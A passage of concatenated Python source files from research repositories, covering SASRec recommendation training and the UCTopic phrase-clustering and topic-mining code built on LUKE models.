ItemDataset.code(): ItemDataset,
}
def dataset_factory(args):
dataset = DATASETS[args.dataset_code]
return dataset(args)
```
#### File: datasets/negative_samplers/popular.py
```python
from .base import AbstractNegativeSampler
from tqdm import trange
from tqdm import tqdm
from collections import Counter
import numpy as np
class PopularNegativeSampler(AbstractNegativeSampler):
@classmethod
def code(cls):
return 'popular'
def generate_negative_samples(self):
popularity = self.items_by_popularity()
keys = list(popularity.keys())
values = [popularity[k] for k in keys]
sum_value = np.sum(values)
p = [value / sum_value for value in values]
negative_samples = {}
print('Sampling negative items')
for user in tqdm(self.test):
seen = set(self.train[user])
seen.update(self.val[user])
seen.update(self.test[user])
samples = []
while len(samples) < self.sample_size:
sampled_ids = np.random.choice(keys, self.sample_size, replace=False, p=p).tolist()
sampled_ids = [x for x in sampled_ids if x not in seen and x not in samples]
samples.extend(sampled_ids)
samples = samples[:self.sample_size]
negative_samples[user] = samples
return negative_samples
def items_by_popularity(self):
popularity = Counter()
for user in tqdm(self.test):
popularity.update(self.train[user])
popularity.update(self.val[user])
popularity.update(self.test[user])
return popularity
```
#### File: src/models/onnx_support.py
```python
from typing import Optional
import torch
import torch.nn as nn
import torch.nn.functional as F
import math
MAX_VAL = 1e4 # considering fp16
########
# Tril #
########
def tril_mask_onnx(inputs: torch.BoolTensor,
diagonal: Optional[int] = 0) -> torch.FloatTensor:
"""Caveat to export an tril-based mask with ONNX.
Args:
inputs: Input tensor.
diagonal: Value of diagonal.
Returns:
(torch.FloatTensor): Output tensor.
"""
arange = torch.arange(inputs.size(0), device=inputs.device)
arange2 = torch.arange(inputs.size(1), device=inputs.device)
mask = arange.unsqueeze(-1).expand(-1, inputs.size(1)) >= (arange2 - diagonal)
return mask
class PointWiseFeedForward(torch.nn.Module):
def __init__(self, hidden_units, dropout_rate):
super(PointWiseFeedForward, self).__init__()
self.linear1 = torch.nn.Linear(hidden_units, hidden_units)
self.dropout1 = torch.nn.Dropout(p=dropout_rate)
self.relu = torch.nn.ReLU()
self.linear2 = torch.nn.Linear(hidden_units, hidden_units)
self.dropout2 = torch.nn.Dropout(p=dropout_rate)
def forward(self, inputs):
outputs = self.dropout2(self.linear2(self.relu(self.dropout1(self.linear1(inputs.transpose(-1, -2))))))
outputs = outputs.transpose(-1, -2) # as Conv1D requires (N, C, Length)
outputs += inputs
return outputs
class MultiHeadAttention(nn.Module):
"Take in model size and number of heads."
def __init__(self, d_model, h, dropout=0.1):
super().__init__()
assert d_model % h == 0
self.d_k = d_model // h
self.h = h
self.linear_layers = nn.ModuleList([nn.Linear(d_model, d_model) for _ in range(3)])
self.output_linear = nn.Linear(d_model, d_model)
self.dropout = nn.Dropout(p=dropout)
def forward(self, query, key, value, attn_mask=None):
batch_size = query.size(0)
query, key, value = [l(x).view(batch_size, -1, self.h, self.d_k).transpose(1, 2)
for l, x in zip(self.linear_layers, (query, key, value))]
scores = torch.matmul(query, key.transpose(-2, -1)) / math.sqrt(query.size(-1))
if attn_mask is not None:
# scores = scores.masked_fill(mask, -MAX_VAL)
# TensorRT TODO: `masked_fill` cannot be supported by TensorRT 8.2.0
if len(attn_mask.size()) == 2:
mask = attn_mask.unsqueeze(0).unsqueeze(0) * MAX_VAL
scores = scores - mask
p_attn = F.softmax(scores, dim=-1)
if self.dropout is not None:
p_attn = self.dropout(p_attn)
x = torch.matmul(p_attn, value)
x = x.transpose(1, 2).contiguous().view(batch_size, -1, self.h * self.d_k)
return self.output_linear(x), p_attn
```
#### File: src/trainers/__init__.py
```python
from .sasrec import SASRecSampleTrainer
TRAINERS = {
SASRecSampleTrainer.code(): SASRecSampleTrainer,
}
def trainer_factory(args, model, train_loader, val_loader, test_loader, ckpt_root, user2seq, embed_only=False):
trainer = TRAINERS[args.trainer_code]
return trainer(args, model, train_loader, val_loader, test_loader, ckpt_root, user2seq, embed_only)
```
#### File: src/trainers/utils.py
```python
import torch
import torch.nn as nn
from sklearn.metrics import f1_score, precision_score, recall_score
MAX_VAL = 1e4
THRESHOLD = 0.5
class Ranker(nn.Module):
def __init__(self, metrics_ks, user2seq):
super().__init__()
self.ks = metrics_ks
self.ce = nn.CrossEntropyLoss()
self.user2seq = user2seq
def forward(self, scores, labels, lengths=None, seqs=None, users=None):
labels = labels.squeeze(-1)
loss = self.ce(scores, labels)
predicts = scores[torch.arange(scores.size(0)), labels].unsqueeze(-1) # gather perdicted values
if seqs is not None:
scores[torch.arange(scores.size(0)).unsqueeze(-1), seqs] = -MAX_VAL # mask the rated items
if users is not None:
for i in range(len(users)):
scores[i][self.user2seq[users[i].item()]] = -MAX_VAL
valid_length = (scores > -MAX_VAL).sum(-1).float()
rank = (predicts < scores).sum(-1).float()
res = []
for k in self.ks:
indicator = (rank < k).float()
res.append(
((1 / torch.log2(rank+2)) * indicator).mean().item() # ndcg@k
)
res.append(
indicator.mean().item() # hr@k
)
res.append((1 / (rank+1)).mean().item()) # MRR
res.append((1 - (rank/valid_length)).mean().item()) # AUC
# res.append((1 - (rank/valid_length)).mean().item()) # AUC
return res + [loss.item()]
class SampleRanker(nn.Module):
def __init__(self, metrics_ks, user2seq):
super().__init__()
self.ks = metrics_ks
self.ce = nn.CrossEntropyLoss()
self.user2seq = user2seq
def forward(self, scores):
predicts = scores[:, 0].unsqueeze(-1) # gather perdicted values
valid_length = scores.size()[-1] - 1
rank = (predicts < scores).sum(-1).float()
res = []
for k in self.ks:
indicator = (rank < k).float()
res.append(
((1 / torch.log2(rank+2)) * indicator).mean().item() # ndcg@k
)
res.append(
indicator.mean().item() # hr@k
)
res.append((1 / (rank+1)).mean().item()) # MRR
res.append((1 - (rank/valid_length)).mean().item()) # AUC
return res + [0]
``` |
{
"source": "JiachengLi1995/UCTopic",
"score": 2
} |
#### File: JiachengLi1995/UCTopic/clustering_ccl_finetune.py
```python
import torch
import numpy as np
import random
from tqdm import tqdm
from collections import defaultdict, Counter
from uctopic.models import UCTopicCluster
from clustering.trainer import ClusterLearner
from clustering.kmeans import get_kmeans
from clustering.dataloader import get_train_loader
from clustering.consts import ARGS, TOKENIZER, DEVICE
from clustering.utils import dataset_reader, get_features, set_logger, update_logger, get_rankings
from clustering.evaluation import evaluate_embedding
def set_global_random_seed(seed):
torch.manual_seed(seed)
torch.cuda.manual_seed(seed)
np.random.seed(seed)
random.seed(seed)
def main():
set_global_random_seed(ARGS.seed)
# Conduct clustering with kmeans
if 'conll2003' in ARGS.data_path:
label_dict = {'PER':0, 'LOC':1, 'ORG':2}
elif 'bc5cdr' in ARGS.data_path:
label_dict = {'Chemical': 0, 'Disease': 1}
elif 'mitmovie' in ARGS.data_path:
label_dict = {'person': 0, 'title': 1}
elif 'wnut2017' in ARGS.data_path:
label_dict = {'corporation': 0, 'creative_work':1, 'group': 2,
'location': 3, 'person': 4, 'product': 5}
else:
raise NotImplementedError
ARGS.num_classes = len(label_dict)
model = UCTopicCluster.from_pretrained("uctopic-base")
model.to(DEVICE)
model.eval()
clustering_data = dataset_reader(ARGS.data_path, label_dict)
features, labels = get_features(clustering_data, TOKENIZER, model)
score_factor, score_cosine, cluster_centers = get_kmeans(features, labels, ARGS.num_classes)
rankings = get_rankings(score_cosine, positive_ratio=0.1)
pseudo_label_dict = defaultdict(list)
for i in range(len(rankings)):
for j in range(len(rankings[i])):
pseudo_label_dict[clustering_data[rankings[i][j]]['span_lemma']].append(j)
## majority vote
for phrase, predictions in pseudo_label_dict.items():
pseudo_label_dict[phrase] = Counter(predictions).most_common()[0][0]
model.update_cluster_centers(cluster_centers)
# dataset loader
train_loader = get_train_loader(ARGS, pseudo_label_dict)
# optimizer
optimizer = torch.optim.Adam(model.parameters(), lr=ARGS.lr)
print(optimizer)
# set up logger
logger = set_logger(ARGS.save_path)
global_step = 0
# set up the trainer
evaluate_embedding(clustering_data, TOKENIZER, model, ARGS, global_step, logger)
learner = ClusterLearner(model, optimizer)
model.train()
for epoch in range(ARGS.epoch):
tqdm_dataloader = tqdm(train_loader, ncols=100)
for features in tqdm_dataloader:
for feature in features:
for k, v in feature.items():
feature[k] = v.to(DEVICE)
loss = learner.forward(features)
tqdm_dataloader.set_description(
'Epoch{}, Global Step {}, CL-loss {:.5f}'.format(
epoch, global_step, loss['Instance-CL_loss']
))
update_logger(logger, loss, global_step)
global_step+=1
if global_step % ARGS.steps_per_eval == 0:
evaluate_embedding(clustering_data, TOKENIZER, model, ARGS, global_step, logger)
model.train()
print('Final test:')
evaluate_embedding(clustering_data, TOKENIZER, model, ARGS, global_step, logger)
if __name__ == '__main__':
main()
```
#### File: UCTopic/clustering/consts.py
```python
import argparse
import torch
import spacy
from . import UCTopicTokenizer
from nltk import WordNetLemmatizer
def get_device(gpu):
return torch.device('cpu' if gpu is None else f'cuda:{gpu}')
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument("--gpu", type=str, default=None)
parser.add_argument("--data_path", type=str, default='data/conll2003/all_data.json')
parser.add_argument("--save_path", type=str, default='clustering_results/')
parser.add_argument("--num_classes", type=int, default=2)
parser.add_argument("--max_training_examples", type=int, default=100000)
parser.add_argument("--steps_per_eval", type=int, default=20)
parser.add_argument("--preprocessing_num_workers", type=int, default=4)
parser.add_argument("--epoch", type=int, default=50)
parser.add_argument("--seed", type=int, default=999)
parser.add_argument("--batch_size", type=int, default=32)
parser.add_argument("--lr", type=float, default=1e-5)
parser.add_argument("--temp", type=float, default=0.05)
parser.add_argument('--alpha', type=float, default=1.0)
args = parser.parse_args()
return args
ARGS = parse_args()
DEVICE = get_device(ARGS.gpu)
TOKENIZER = UCTopicTokenizer.from_pretrained('studio-ousia/luke-base')
LEMMATIZER = WordNetLemmatizer()
NLP = spacy.load('en_core_web_sm', disable=['ner'])
```
#### File: JiachengLi1995/UCTopic/find_topic.py
```python
import torch
import os
import random
from tqdm import tqdm
import numpy as np
import json
import pickle
from multiprocessing import Pool
from collections import defaultdict, Counter
from clustering.utils import get_rankings
from clustering.kmeans import get_kmeans, get_kmeans_score
from topic_modeling.dataloader import get_train_loader
from clustering.trainer import ClusterLearner
from topic_modeling.consts import NLP, ARGS, DEVICE
from topic_modeling.utils import read_data, get_features, get_probs
from uctopic.models import UCTopicCluster
class NounPhraser:
@staticmethod
def process_data(data):
sentence_dict = dict()
phrase_list = []
for line in data:
doc_id = line['doc_id']
text = line['text']
sentence_dict[doc_id] = text
pool = Pool(processes=ARGS.num_workers)
pool_func = pool.imap(func=NounPhraser.rule_based_noun_phrase, iterable=data)
doc_tuples = list(tqdm(pool_func, total=len(data), ncols=100, desc=f'Process data and extract phrases'))
for phrases in doc_tuples:
phrase_list += phrases
pool.close()
pool.join()
return sentence_dict, phrase_list
@staticmethod
def rule_based_noun_phrase(line):
definite_articles = {'a', 'the', 'an', 'this', 'those', 'that', 'these', \
'my', 'his', 'her', 'your', 'their', 'our'}
text = line['text']
if not text:
return []
doc_id = line['doc_id']
doc = NLP(text)
if len(doc) > ARGS.max_length:
return []
phrases = []
for chunk in doc.noun_chunks:
start, end = chunk.start, chunk.end ## token-level idx
if len(chunk.text.split()) > 1:
left_p = '(' in chunk.text
right_p = ')' in chunk.text
if left_p == right_p:
ps = chunk.text
if ps.split(" ")[0].lower() in definite_articles:
new_ps = " ".join(ps.split(" ")[1:])
start_char = chunk.start_char + len(ps) - len(new_ps)
span_lemma = ' '.join([doc[i].lemma_.lower() for i in range(start+1, end)])
assert doc.text[start_char:chunk.end_char] == new_ps
phrases.append((doc_id, start_char, chunk.end_char, span_lemma))
else:
span_lemma = ' '.join([doc[i].lemma_.lower() for i in range(start, end)])
phrases.append((doc_id, chunk.start_char, chunk.end_char, span_lemma))
else:
if doc[chunk.start].pos_ != 'PRON':
span_lemma = ' '.join([doc[i].lemma_.lower() for i in range(start, end)])
phrases.append((doc_id, chunk.start_char, chunk.end_char, span_lemma))
return phrases
def main():
model = UCTopicCluster.from_pretrained('uctopic-base')
model.to(DEVICE)
model.eval()
data_path = os.path.join(ARGS.data_path)
ARGS.num_classes = eval(ARGS.num_classes)
data = read_data(data_path)
sentence_dict, phrase_list = NounPhraser.process_data(data)
# To make sure the number of topics, we randomly sample part of phrases first
phrase_list_sampled = random.sample(phrase_list, min(ARGS.sample_num_cluster, len(phrase_list)))
features = get_features(sentence_dict, phrase_list_sampled, model)
kmeans_scores = []
for num_class in range(ARGS.num_classes[0], ARGS.num_classes[1]+1):
score = get_kmeans_score(features, num_class)
print('For n_clusters = ', num_class, 'The silhouette_score is: ', score)
kmeans_scores.append((num_class, score))
kmeans_scores = sorted(kmeans_scores, key=lambda x: x[1], reverse=True)
num_class = kmeans_scores[0][0]
print('We select the number of topics: ', num_class)
## To finetune, we randomly sample part of phrases
phrase_list_sampled = random.sample(phrase_list, min(ARGS.sample_num_finetune, len(phrase_list)))
features = get_features(sentence_dict, phrase_list_sampled, model)
score_factor, score_cosine, cluster_centers = get_kmeans(features, None, num_class)
rankings = get_rankings(score_cosine, positive_ratio=0.1)
pseudo_label_dict = defaultdict(list)
for i in range(len(rankings)):
for j in range(len(rankings[i])):
pseudo_label_dict[phrase_list_sampled[rankings[i][j]][-1]].append(j)
## majority vote
for phrase, predictions in pseudo_label_dict.items():
pseudo_label_dict[phrase] = Counter(predictions).most_common()[0][0]
model.update_cluster_centers(cluster_centers)
# dataset loader
train_loader = get_train_loader(sentence_dict, phrase_list_sampled, ARGS, pseudo_label_dict)
# optimizer
optimizer = torch.optim.Adam(model.parameters(), lr=ARGS.lr)
print(optimizer)
# set up logger
global_step = 0
# set up the trainer
learner = ClusterLearner(model, optimizer)
model.train()
ret = False
for epoch in range(ARGS.epoch):
tqdm_dataloader = tqdm(train_loader, ncols=100)
for features in tqdm_dataloader:
for feature in features:
for k, v in feature.items():
feature[k] = v.to(DEVICE)
loss = learner.forward(features)
tqdm_dataloader.set_description(
'Epoch{}, Global Step {}, CL-loss {:.5f}'.format(
epoch, global_step, loss['Instance-CL_loss']
))
global_step+=1
if global_step >= ARGS.finetune_step:
ret = True
break
if ret:
break
model.eval()
all_prob = get_probs(sentence_dict, phrase_list, model)
all_pred = all_prob.max(1)[1].tolist()
all_prob = all_prob.numpy()
assert len(phrase_list) == len(all_pred)
phrase_pred = []
merge_phrase_dict = defaultdict(list)
topic_phrase_dict = defaultdict(list)
for phrase, pred, prob in zip(phrase_list, all_pred, all_prob):
phrase_pred.append([phrase, pred])
merge_phrase_dict[phrase[-1]].append(prob)
for phrase, prob_list in merge_phrase_dict.items():
prob_mean = np.array(prob_list).mean(axis=0)
pred = prob_mean.argmax()
merge_phrase_dict[phrase] = [pred, prob_mean[pred]]
topic_phrase_dict[str(pred)].append((phrase, prob_mean[pred]))
for topic, v in topic_phrase_dict.items():
topic_phrase_dict[str(topic)] = [(line[0], str(round(line[1], 4))) for line in sorted(v, key=lambda x: x[1], reverse=True)]
results_path = os.path.join(ARGS.save_path, ARGS.dataset)
if not os.path.exists(ARGS.save_path):
os.mkdir(ARGS.save_path)
if not os.path.exists(results_path):
os.mkdir(results_path)
with open(os.path.join(results_path, 'phrase_instances_pred.json'), 'w', encoding='utf8') as f:
json.dump(phrase_pred, f)
with open(os.path.join(results_path, 'merged_phrase_pred_prob.pickle'), 'wb') as f:
pickle.dump(merge_phrase_dict, f)
with open(os.path.join(results_path, 'topics_phrases.json'), 'w', encoding='utf8') as f:
json.dump(topic_phrase_dict, f)
if __name__ == '__main__':
main()
```
#### File: UCTopic/topic_modeling/consts.py
```python
import os
import torch
import spacy
import argparse
from . import UCTopicTokenizer
from nltk import WordNetLemmatizer
def get_device(gpu):
return torch.device('cpu' if gpu is None else f'cuda:{gpu}')
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument("--gpu", type=int, default=None)
parser.add_argument("--data_path", type=str, default='data/topic_data/')
parser.add_argument("--dataset", type=str, default='google_restaurant')
parser.add_argument("--save_path", type=str, default='topic_results')
parser.add_argument("--num_classes", type=str, default='[10, 25]', help='Min and Max number of classes.')
parser.add_argument("--sample_num_cluster", type=int, default=5000)
parser.add_argument("--sample_num_finetune", type=int, default=100000)
parser.add_argument("--contrastive_num", type=int, default=10)
parser.add_argument("--finetune_step", type=int, default=2000)
parser.add_argument("--num_workers", type=int, default=8)
parser.add_argument("--epoch", type=int, default=10)
parser.add_argument("--max_length", type=int, default=32)
parser.add_argument("--batch_size", type=int, default=16)
parser.add_argument("--lr", type=float, default=1e-5)
parser.add_argument("--temp", type=float, default=0.05)
parser.add_argument('--alpha', type=float, default=1.0)
args = parser.parse_args()
return args
ARGS = parse_args()
ARGS.data_path = os.path.join(ARGS.data_path, ARGS.dataset+'.json')
DEVICE = get_device(ARGS.gpu)
def get_device(gpu):
return torch.device('cpu' if gpu is None else f'cuda:{gpu}')
TOKENIZER = UCTopicTokenizer.from_pretrained('studio-ousia/luke-base')
LEMMATIZER = WordNetLemmatizer()
NLP = spacy.load('en_core_web_sm', disable=['ner'])
```
#### File: UCTopic/uctopic/models.py
```python
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.distributed as dist
from torch.nn import Parameter
from transformers.models.roberta.modeling_roberta import RobertaLMHead
from transformers.models.luke.modeling_luke import LukePreTrainedModel
from transformers import LukeConfig, LukeModel
class UCTopicConfig(LukeConfig):
def __init__(
self,
vocab_size=50267,
entity_vocab_size=500000,
hidden_size=768,
entity_emb_size=256,
num_hidden_layers=12,
num_attention_heads=12,
intermediate_size=3072,
hidden_act="gelu",
hidden_dropout_prob=0.1,
attention_probs_dropout_prob=0.1,
max_position_embeddings=512,
type_vocab_size=2,
initializer_range=0.02,
layer_norm_eps=1e-12,
gradient_checkpointing=False,
use_entity_aware_attention=True,
pad_token_id=1,
bos_token_id=0,
eos_token_id=2,
alpha=1.0,
temp=0.05,
**kwargs
):
super().__init__(
vocab_size,
entity_vocab_size,
hidden_size,
entity_emb_size,
num_hidden_layers,
num_attention_heads,
intermediate_size,
hidden_act,
hidden_dropout_prob,
attention_probs_dropout_prob,
max_position_embeddings,
type_vocab_size,
initializer_range,
layer_norm_eps,
gradient_checkpointing,
use_entity_aware_attention,
pad_token_id,
bos_token_id,
eos_token_id,
**kwargs
)
# for contrastive learning
self.alpha = alpha
self.temp = temp
class MLPLayer(nn.Module):
"""
Head for getting sentence representations over RoBERTa/BERT's CLS representation.
"""
def __init__(self, config):
super().__init__()
self.dense = nn.Linear(config.hidden_size, config.hidden_size)
self.activation = nn.Tanh()
def forward(self, features, **kwargs):
x = self.dense(features)
x = self.activation(x)
return x
class Similarity(nn.Module):
"""
Dot product or cosine similarity
"""
def __init__(self, temp):
super().__init__()
self.temp = temp
self.cos = nn.CosineSimilarity(dim=-1)
def forward(self, x, y):
return self.cos(x, y) / self.temp
class UCTopicModel(LukePreTrainedModel):
def __init__(self, model_args, luke_config):
super().__init__(luke_config)
self.model_args = model_args
self.model_name = model_args.model_name_or_path
self.luke = LukeModel.from_pretrained(self.model_name)
self.luke_config = luke_config
self.lm_head = RobertaLMHead(self.luke_config)
self.mlp = MLPLayer(self.luke_config)
self.sim = Similarity(temp=self.model_args.temp)
def forward(self,
input_ids=None,
attention_mask=None,
token_type_ids=None,
entity_ids=None,
entity_attention_mask=None,
entity_token_type_ids=None,
entity_position_ids=None,
output_attentions=None,
output_hidden_states=None,
return_dict=None,
phrase_emb=False,
mlm_input_ids=None,
mlm_labels=None,
):
if phrase_emb:
return self.phremb_forward(input_ids=input_ids,
attention_mask=attention_mask,
token_type_ids=token_type_ids,
entity_ids=entity_ids,
entity_attention_mask=entity_attention_mask,
entity_token_type_ids=entity_token_type_ids,
entity_position_ids=entity_position_ids,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
)
else:
return self.cl_forward(input_ids=input_ids,
attention_mask=attention_mask,
token_type_ids=token_type_ids,
entity_ids=entity_ids,
entity_attention_mask=entity_attention_mask,
entity_token_type_ids=entity_token_type_ids,
entity_position_ids=entity_position_ids,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
mlm_input_ids=mlm_input_ids,
mlm_labels=mlm_labels,
)
def cl_forward(self,
input_ids=None,
attention_mask=None,
token_type_ids=None,
entity_ids=None,
entity_attention_mask=None,
entity_token_type_ids=None,
entity_position_ids=None,
output_attentions=None,
output_hidden_states=None,
mlm_input_ids=None,
mlm_labels=None,
):
batch_size = input_ids.size(0)
num_sent = input_ids.size(1)
entity_length = entity_ids.size(2)
max_mention_length = entity_position_ids.size(-1)
mlm_outputs = None
# Flatten input for encoding
input_ids = input_ids.view((-1, input_ids.size(-1))) # (bs * num_sent, len)
attention_mask = attention_mask.view((-1, attention_mask.size(-1))) # (bs * num_sent len)
entity_ids = entity_ids.view(-1, entity_length)
entity_attention_mask = entity_attention_mask.view(-1, entity_length)
entity_position_ids = entity_position_ids.view(-1, entity_length, max_mention_length)
if token_type_ids is not None:
token_type_ids = token_type_ids.view((-1, token_type_ids.size(-1))) # (bs * num_sent, len)
if entity_token_type_ids is not None:
entity_token_type_ids = entity_token_type_ids.view(-1, entity_length)
# Get raw embeddings
outputs = self.luke(
input_ids,
attention_mask=attention_mask,
token_type_ids=token_type_ids,
entity_ids=entity_ids,
entity_attention_mask=entity_attention_mask,
entity_token_type_ids=entity_token_type_ids,
entity_position_ids=entity_position_ids,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=True,
)
# MLM auxiliary objective
if mlm_input_ids is not None:
mlm_input_ids = mlm_input_ids.view((-1, mlm_input_ids.size(-1)))
mlm_outputs = self.luke(
mlm_input_ids,
attention_mask=attention_mask,
token_type_ids=token_type_ids,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=True,
)
entity_pooler = outputs['entity_last_hidden_state'] # (bs*num_sent, entity_length, hidden_size)
entity_pooler = entity_pooler.view((batch_size, num_sent, entity_pooler.size(-1))) # (bs, num_sent, hidden) entity_length should be 1
entity_pooler = self.mlp(entity_pooler)
# # Separate representation
z1, z2 = entity_pooler[:,0], entity_pooler[:,1]
# # Gather all embeddings if using distributed training
if dist.is_initialized() and self.training:
# Dummy vectors for allgather
z1_list = [torch.zeros_like(z1) for _ in range(dist.get_world_size())]
z2_list = [torch.zeros_like(z2) for _ in range(dist.get_world_size())]
# Allgather
dist.all_gather(tensor_list=z1_list, tensor=z1.contiguous())
dist.all_gather(tensor_list=z2_list, tensor=z2.contiguous())
# Since allgather results do not have gradients, we replace the
# current process's corresponding embeddings with original tensors
z1_list[dist.get_rank()] = z1
z2_list[dist.get_rank()] = z2
# Get full batch embeddings: (bs x N, hidden)
z1 = torch.cat(z1_list, 0)
z2 = torch.cat(z2_list, 0)
cos_sim = self.sim(z1.unsqueeze(1), z2.unsqueeze(0))
labels = torch.arange(cos_sim.size(0)).long().to(cos_sim.device)
loss_fct = nn.CrossEntropyLoss()
loss = loss_fct(cos_sim, labels)
correct_num = (torch.argmax(cos_sim, 1) == labels).sum().detach().cpu().item()
# Calculate loss for MLM
if mlm_outputs is not None and mlm_labels is not None:
mlm_labels = mlm_labels.view(-1, mlm_labels.size(-1))
prediction_scores = self.lm_head(mlm_outputs.last_hidden_state)
masked_lm_loss = loss_fct(prediction_scores.view(-1, self.luke_config.vocab_size), mlm_labels.view(-1))
loss = loss + self.model_args.mlm_weight * masked_lm_loss
return {'loss': loss, 'logits': cos_sim, 'correct_num': correct_num, 'total_num': batch_size}
def phremb_forward(
self,
input_ids=None,
attention_mask=None,
token_type_ids=None,
position_ids=None,
entity_ids=None,
entity_attention_mask=None,
entity_token_type_ids=None,
entity_position_ids=None,
head_mask=None,
inputs_embeds=None,
output_attentions=None,
output_hidden_states=None,
return_dict=None,
):
return_dict = return_dict if return_dict is not None else self.luke_config.use_return_dict
outputs = self.luke(
input_ids,
attention_mask=attention_mask,
token_type_ids=token_type_ids,
position_ids=position_ids,
entity_ids=entity_ids,
entity_attention_mask=entity_attention_mask,
entity_token_type_ids=entity_token_type_ids,
entity_position_ids=entity_position_ids,
head_mask=head_mask,
inputs_embeds=inputs_embeds,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
)
return outputs
class UCTopic(LukePreTrainedModel):
config_class = UCTopicConfig
def __init__(self, config):
super().__init__(config)
self.luke = LukeModel(config)
self.config = config
self.mlp = MLPLayer(self.config)
def forward(self,
input_ids=None,
attention_mask=None,
token_type_ids=None,
entity_ids=None,
entity_attention_mask=None,
entity_token_type_ids=None,
entity_position_ids=None,
output_attentions=None,
output_hidden_states=None,
return_dict=None
):
outputs = self.luke(
input_ids,
attention_mask=attention_mask,
token_type_ids=token_type_ids,
entity_ids=entity_ids,
entity_attention_mask=entity_attention_mask,
entity_token_type_ids=entity_token_type_ids,
entity_position_ids=entity_position_ids,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
)
if return_dict:
entity_pooler = outputs['entity_last_hidden_state'] # (bs, entity_length, hidden_size)
else:
entity_pooler = outputs.entity_last_hidden_state
entity_pooler = self.mlp(entity_pooler)
return outputs, entity_pooler.squeeze()
class UCTopicCluster(LukePreTrainedModel):
config_class = UCTopicConfig
def __init__(self, config, cluster_centers=None):
super().__init__(config)
self.luke = LukeModel(config)
self.config = config
self.mlp = MLPLayer(self.config)
self.alpha = self.config.alpha
self.sim = Similarity(temp=self.config.temp)
self.softmax = nn.Softmax(dim=-1)
# Instance-CL head
if cluster_centers is not None:
initial_cluster_centers = torch.tensor(
cluster_centers, dtype=torch.float, requires_grad=True)
self.cluster_centers = Parameter(initial_cluster_centers)
def forward(self,
input_ids=None,
attention_mask=None,
token_type_ids=None,
entity_ids=None,
entity_attention_mask=None,
entity_token_type_ids=None,
entity_position_ids=None,
output_attentions=None,
output_hidden_states=None,
return_dict=None
):
outputs = self.luke(
input_ids,
attention_mask=attention_mask,
token_type_ids=token_type_ids,
entity_ids=entity_ids,
entity_attention_mask=entity_attention_mask,
entity_token_type_ids=entity_token_type_ids,
entity_position_ids=entity_position_ids,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
)
if return_dict:
entity_pooler = outputs['entity_last_hidden_state'] # (bs, entity_length, hidden_size)
else:
entity_pooler = outputs.entity_last_hidden_state
entity_pooler = self.mlp(entity_pooler)
return outputs, entity_pooler.squeeze()
def get_cl_loss(self, anchor_embd, cl_embd):
batch_size, hidden_size = anchor_embd.size()
anchor_embd = anchor_embd.unsqueeze(1) ##(batch, 1, hidden_size)
cl_embd = cl_embd.view([batch_size, -1, hidden_size])
cos_sim = self.sim(anchor_embd, cl_embd) ##(batch, class_num)
label_size = cos_sim.size(0)
labels = torch.zeros(label_size, device=anchor_embd.device, dtype=torch.long) # (batch_size)
loss_fct = nn.CrossEntropyLoss()
loss = loss_fct(cos_sim, labels)
return loss
def get_cluster_prob(self, embeddings):
cos = self.sim(embeddings.unsqueeze(1), self.cluster_centers.unsqueeze(0))
return self.softmax(cos)
def update_cluster_centers(self, cluster_centers):
initial_cluster_centers = torch.tensor(
cluster_centers, dtype=torch.float, requires_grad=True, device=self.luke.device)
self.cluster_centers = Parameter(initial_cluster_centers)
```
#### File: UCTopic/uctopic/utils.py
```python
from typing import List
import spacy
from numpy import ndarray
from tqdm import tqdm
from multiprocessing import Pool
try:
NLP = spacy.load('en_core_web_sm', disable=['ner', 'token2vec'])
except:
import os
os.system("python -m spacy download en_core_web_sm")
NLP = spacy.load('en_core_web_sm', disable=['ner', 'token2vec'])
class NounPhraser:
@staticmethod
def process_data(data: List,
num_workers: int = 8):
sentence_dict = dict()
phrase_list = []
for doc_id, sentence in enumerate(data):
sentence_dict[doc_id] = sentence
pool = Pool(processes=num_workers)
pool_func = pool.imap(func=NounPhraser.rule_based_noun_phrase, iterable=sentence_dict.items())
doc_tuples = list(tqdm(pool_func, total=len(sentence_dict), desc=f'Extract phrases'))
for phrases in doc_tuples:
phrase_list += phrases
pool.close()
pool.join()
return sentence_dict, phrase_list
@staticmethod
def rule_based_noun_phrase(line):
definite_articles = {'a', 'the', 'an', 'this', 'those', 'that', 'these', \
'my', 'his', 'her', 'your', 'their', 'our'}
doc_id, text = line
if not text:
return []
doc = NLP(text)
phrases = []
for chunk in doc.noun_chunks:
start, end = chunk.start, chunk.end ## token-level idx
if len(chunk.text.split()) > 1:
left_p = '(' in chunk.text
right_p = ')' in chunk.text
if left_p == right_p:
ps = chunk.text
if ps.split(" ")[0].lower() in definite_articles:
new_ps = " ".join(ps.split(" ")[1:])
start_char = chunk.start_char + len(ps) - len(new_ps)
span_lemma = ' '.join([doc[i].lemma_.lower().strip() for i in range(start+1, end)])
assert doc.text[start_char:chunk.end_char] == new_ps
phrases.append((doc_id, start_char, chunk.end_char, span_lemma))
else:
span_lemma = ' '.join([doc[i].lemma_.lower().strip() for i in range(start, end)])
phrases.append((doc_id, chunk.start_char, chunk.end_char, span_lemma))
else:
if doc[chunk.start].pos_ != 'PRON':
span_lemma = ' '.join([doc[i].lemma_.lower().strip() for i in range(start, end)])
phrases.append((doc_id, chunk.start_char, chunk.end_char, span_lemma))
return phrases
class Lemmatizer:
@staticmethod
def process_data(sentences: List,
spans: List,
num_workers: int = 8):
instance_dict = dict()
phrase_list = []
for doc_id, instance in enumerate(zip(sentences, spans)):
instance_dict[doc_id] = instance
pool = Pool(processes=num_workers)
pool_func = pool.imap(func=Lemmatizer._process, iterable=instance_dict.items())
doc_tuples = list(tqdm(pool_func, total=len(instance_dict), desc=f'Normalize phrases'))
for phrases in doc_tuples:
phrase_list += phrases
pool.close()
pool.join()
sentence_dict = dict()
for doc_id, instance in instance_dict.items():
sentence = instance[0]
sentence_dict[doc_id] = sentence
return sentence_dict, phrase_list
@staticmethod
def _process(line):
doc_id, (sentence, spans) = line
phrases = []
for span in spans:
phrase = sentence[span[0]: span[1]]
span_lemma = Lemmatizer.normalize(phrase)
